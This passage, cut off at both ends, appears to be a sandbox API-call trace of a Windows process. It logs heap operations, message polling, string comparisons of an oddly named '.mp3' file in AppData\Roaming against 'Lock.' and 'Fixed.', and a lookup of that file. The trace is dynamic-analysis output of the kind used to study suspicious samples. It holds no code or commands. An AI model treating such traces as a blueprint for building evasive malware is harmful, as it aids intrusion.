hHeap=0x25c0000) returned 1 [0207.487] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0207.487] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.487] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0207.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0207.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_J3DS1U3FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J3DS1U3FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3DS1U3FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DS1U3FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S1U3FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1U3FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U3FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LV.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.490] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_J3DS1U3FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J3DS1U3FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3DS1U3FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DS1U3FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S1U3FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1U3FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U3FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LV.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.491] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0207.491] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0207.491] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.491] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0207.492] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0207.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.492] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/_J3DS1U3FLV.mp3", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87149050, ftCreationTime.dwHighDateTime=0x1d4c7ef, ftLastAccessTime.dwLowDateTime=0x86cd5b30, ftLastAccessTime.dwHighDateTime=0x1d4d542, ftLastWriteTime.dwLowDateTime=0x86cd5b30, ftLastWriteTime.dwHighDateTime=0x1d4d542, nFileSizeHigh=0x0, nFileSizeLow=0x2427, dwReserved0=0xb630039, dwReserved1=0x1b9b2, cFileName="_J3DS1U3FLV.mp3", cAlternateFileName="_J3DS1~1.MP3")) returned 0xaa5860 [0207.493] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0207.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.495] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.495] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0207.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0207.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.496] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.497] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.497] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.497] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.497] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.498] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.498] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.498] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.500] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.500] 